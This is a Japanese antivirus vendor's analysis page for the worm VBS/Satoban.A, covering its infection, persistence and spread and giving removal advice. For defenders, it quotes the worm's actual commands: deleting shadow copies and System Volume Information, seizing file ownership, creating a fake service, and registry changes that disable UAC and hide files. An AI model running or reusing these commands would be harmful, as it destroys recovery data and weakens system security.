キヤノンITソリューションズ株式会社 閉じる

ウイルス情報  
最新ウイルス定義ファイルバージョン : 12381
(2015/10/09 17:02)

最新ウイルス情報 : VBS/Satoban.A
公開日:2014年5月16日
このウイルスに関する危険度 :■■■□□

定義名称 VBS/Satoban.A
シグネチャ検査による結果だった場合 VBS/Satoban.A
別名 Win32:Agent-AQTU(Avast)
種別 ワーム
アドバンスドヒューリスティック検査による結果だった場合 このオリジナルのトロイを利用した新種、亜種が検出された場合は、「NewHeur_PE」もしくは「VBS/Satoban.Aの亜種 ワーム」という名称で警告が出ます。
対応時期 バージョン9583(20140324)以降
影響を受けるプラットフォーム Microsoft Windows
概要 このワームは、共有フォルダーとリムーバブルメディアを介して感染を広げます。インターネットからいくつかのファイルをダウンロードし、実行しようとします。詳しい活動内容については、解説欄をご参照ください。

検出した場合の対処方法

常駐監視を行っている各検査プログラムによって検出された場合は、駆除もしくは削除を行ってください。駆除もしくは削除ができない場合は、Windows のシステムの復元により修復しなければならない可能性があります。

対象のファイルが身に覚えのないファイル名の場合は、そのファイル自身がウイルスそのものである可能性が高いので、駆除ではなくすべて削除をしてください。これにより2次感染、3次感染を防げます。また、自分が作成したデータ等に感染していた場合は、駆除が可能な場合もありますが、駆除のボタンが押せない状態もしくは駆除しても失敗する場合は、すでに元のデータの戻せない状態までデータが書き換えられている場合もあります。この場合もすべて削除してください。

解説での表記(用語)について

以下の説明文では、Windowsオペレーティングシステムがインストールされたディレクトリを%windir% と表記しており、インストール時の設定により異なる場合があります。%windir% のサブディレクトリである"System"や"System32"は %system% と表記しています。
%allusersprofile%はAll Usersのマイドキュメントディレクトリを表記しています。
%drive%には、任意のドライブ名が入ります。
%temp%はWindowsオペレーティングシステムのテンポラリディレクトリを表記しています。
%systemdrive%は、システムドライブを表記しています。
%systemroot%は、オペレーティングシステムがインストールされたディレクトリを表記しています。

解説


■侵入(インストレーション)について
このワームは、実行時に次のフォルダーを作成します。

%systemdrive%\Kernel
%systemdrive%\Kernel\lpt1
%systemdrive%\security
%systemdrive%\security\lpt1
%systemroot%\system32\system
%systemroot%\system32\system\msg


自身を次の場所にコピーします。

%systemdrive%\Kernel\r00t3er
%systemdrive%\security\blood.dat


%systemdrive%\Kernelフォルダーと%systemdrive%\securityフォルダーには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。

%systemdrive%\Kernel\r00t3erファイルには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。

次のファイルを作成します。

%allusersprofile%\rescue.vbe (1890 B, VBS/TrojanDownloader.Psyme.NJJ)
%systemroot%\system32\system\svchost.exe (12 B)
%systemroot%\system32\system\msg\config.txt (426 B)
%temp%\tmp.vbe (2178 B, VBS/Satoban.A)
%temp%\b.bat (2086 B, VBS/Satoban.A)
%systemdrive%\security\system.vbs (123 B, VBS/Satoban.A)


次のファイルのコピー(コピー元、コピー先)を作成する場合があります。

%systemroot%\system32\wscript.exe, %systemdrive%\security\svchost.exe


次の命令を実行します。

sc create system binPath= "%systemroot%\System32\system\svchost.exe msg" start= auto &
net start system &
sc description system " processus generique de Windows .Si ce service est arrete,les services qui en dependent ne pourront pas demarrer et votre systeme risque d'etre endommage. " &
EXIT


システムが起動するたびに実行されるよう、次のレジストリーエントリーを登録します。

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"rescue" = "%allusersprofile%\rescue.vbe"


次のレジストリーエントリーを作成します。

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
"Timeout" = 0
[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System]
"DisableCMD" = 0
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = 0
"DisableTaskMgr" = 0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate]
"sdate" = "38"
[HKEY_CLASSES_ROOT\Applications\Notepad2.exe\Shell\Open]
"command" = "%systemroot%\System32\Notepad.exe"
[HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open]
"command" = "%systemroot%\System32\Notepad.exe"
[HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command]
"" = "%systemroot%\System32\Notepad.exe"
[HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command]
"" = "%systemroot%\System32\Notepad.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = 2
"ShowSuperHidden" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\System]
"Type" = 16
"Start" = 2
"ErrorControl" = 1
"ImagePath" = "%systemroot%\System32\system\svchost.exe msg"
"ObjectName" = "LocalSystem"
"Description" = " processus generique de Windows .Si ce service est arrete,les services qui en dependent ne pourront pas demarrer et votre systeme risque d'etre endommage. "


次のフォルダーに保存されたファイルを削除する場合があります。

%systemdrive%\Kernel
%systemdrive%\security


■感染について
このワームは、利用可能なローカルドライブやリムーバブルドライブを探します。次のファイルを削除する場合があります。

%drive%\*.vbe
%drive%\*.lnk
%drive%\config.dat
%drive%\autorun.inf
%drive%\microsoft.dat


次のフォルダーを探します。

%drive%\*.*


次のファイルを作成します。

%drive%\%variable%.lnk


新たに作成されるファイルの名前には、検出されたフォルダーの名前が利用されます。

作成されたファイルは悪意のあるファイルへのショートカットです。

自身を次の場所にコピーします。

%drive%\config.dat


この%drive%\config.datファイルには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。

■共有フォルダーを経由した感染について
このワームは、さまざまな共有フォルダーを探します。

次のファイルを削除する場合があります。

%sharedfolder%\*.vbe
%sharedfolder%\*.lnk


次のファイルを作成します。

%sharedfolder%\Mariage.lnk


作成されたファイルは悪意のあるファイルへのショートカットです。

自身を次の場所にコピーします。

%sharedfolder%\Update.dat


この%sharedfolder%\Update.datファイルには、Windows Explorer内で表示されないようにするため、システム(S)属性と隠し(H)属性が設定される場合があります。

■その他の情報
このワームは、次のレジストリーエントリーを設定する場合があります。

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin" = 0
"EnableLua" = 0
[HKEY_CURRENT_USER\VBEFile\DefaultIcon]
"" = "%systemroot%\system32\shell32.dll,1"


次のレジストリーエントリーを削除する場合があります。

[HKEY_CLASSES_ROOT\lnkfile]
"IsShortCut"


次のファイルを作成する場合があります。

%temp%\uac.bat (1904 B, VBS/Agent.NCF)
%temp%\ADMIN.vbe (292 B, VBS/AutoRun.HX)
%temp%\CPBA.bat (390 B, VBS/Satoban.A)
%temp%\tp.vbe (175 B, VBS/AutoRun.HX)
%temp%\tmp.bat (1108 B, VBS/Agent.NCF)


インターネットからファイルをダウンロードする場合があります。7つのURLを保持しています。通信にはHTTPプロトコルが使用されます。

ダウンロードしたファイルを次の場所に保存します。

%systemdrive%\security\system.txt
%temp%\booter.dat
%systemdrive%\kernel\explorer.jpg
%systemdrive%\kernel\update.txt


次のファイルを移動(移動元、移動先)します。

%systemdrive%\security\system.txt, %systemdrive%\security\system.vbe
%temp%\booter.dat, %temp%\reskp.exe
%systemdrive%\security\system.txt, %systemdrive%\security\system.bat
%systemdrive%\security\system.txt, %systemdrive%\security\system.exe
%systemdrive%\kernel\explorer.jpg, %systemdrive%\kernel\explorer.exe
%systemdrive%\kernel\update.txt, %systemdrive%\kernel\Update.exe
%systemroot%\system32\drivers\flpydisk.sys, %systemroot%\system32\drivers\flpydisk.sy_


次のファイルのコピー(コピー元、コピー先)を作成します。

%systemdrive%\kernel\*.vbe, %temp%
%scriptpath%, %temp%


次のファイルを削除します。

%systemdrive%\*.lnk
%systemdrive%\autorun.inf
%temp%\%scriptfile%


次の命令を実行する場合があります。

cmd /K takeown /F %systemdrive%\kernel /A /R /D O &
CACLS %systemdrive%\Kernel /E /T /C /G %username%:F &
takeown /F %systemdrive%\security /A /R /D O &
CACLS %systemdrive%\security /E /T /C /G %username%:F &
takeown /F "%allusersprofile%\" /A /R /D O &
takeown /a /f %systemroot%\System32\wscript.exe &
ICACLS %systemroot%\System32\wscript.exe /Grant %username%:F &
takeown /F "%systemroot%\system32\drivers" /A /R /D O &
takeown /a /f %systemroot%\System32\drivers\flpydisk.sys &
ICACLS %systemroot%\System32\drivers\flpydisk.sys /Grant %username%:F &
takeown /F "%systemdrive%\system Volume Information" /A /R /D O &
CACLS "%systemdrive%\system Volume Information" /E /T /C /G %username%:F &
EXIT
sc config TermService start= auto > nul
svchost.exe /e:VBScript.Encode %systemdrive%\security\blood.dat
cmd /K vssadmin delete shadows /all /quiet & cd/d "%systemdrive%\system volume Information" &
del/f/s/q/a "%systemdrive%\system volume Information\*.*" &
EXIT
cmd /K md %systemroot%\system32\system &
md %systemroot%\system32\system\msg &
EXIT
cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&
@echo ServiceType=272&
echo WaitActive=0&
@echo StartType=2&
@echo ErrorControl=1&
@echo Source=%systemdrive%\security\system.vbs&
@echo ResetPeriod=0&
@echo RebootMsg=&
@echo Command=&
@echo nActions=0&
@ echo Actions=&
@echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt &
EXIT
cmd /K cd/d %systemroot%\system32\drivers &
ren flpydisk.sys flpydisk.sy_ &
del/f/q/s %systemdrive%\security\system.bat &
del/f/q/s %systemdrive%\security\system.exe &
del/f/q/s %systemdrive%\kernel\explorer.exe &
del/f/q/s %systemdrive%\kernel\update.exe &
del/f/q/s ""%temp%\reskp.exe"" &
rd/q/s %systemdrive%\system32 &
rd/q/s %systemdrive%\system &
EXIT
cmd /K del/f/q/A "%systemdrive%\security\*.dat" &
xcopy /C /H /Y /R "%drive%\config.dat" "%systemdrive%\security" &
attrib -s -h "%systemdrive%\security\*.*" &
ren "%systemdrive%\security\*.*" blood.dat &
EXIT
cmd /K del/f/q/A "%systemdrive%\kernel\*.dat" &
xcopy /C /H /Y /R "%drive%\config.dat" "%systemdrive%\kernel" &
attrib -s -h "%systemdrive%\kernel\*.*" &
ren "%systemdrive%\kernel\*.*" r00t3r &
attrib +s +h "%systemdrive%\kernel\*.*" &
EXIT
cmd /K cd/d "%systemdrive%\security" &
copy /b /y blood.dat + &
EXIT


システムの復元ポイントを削除します。

このワームのファイルには次の文字列が記述されています。

'========================================================================================='
'
' C0d3 N4me : S4T4n
' Cr34t0r : R4PTOR
' Created for personal use , modifications or others are not authorized
' For more informations, looking 4 me { - CNG4L on Race }
'
'========================================================================================='


このページのトップへ

(C)Canon IT Solutions Inc.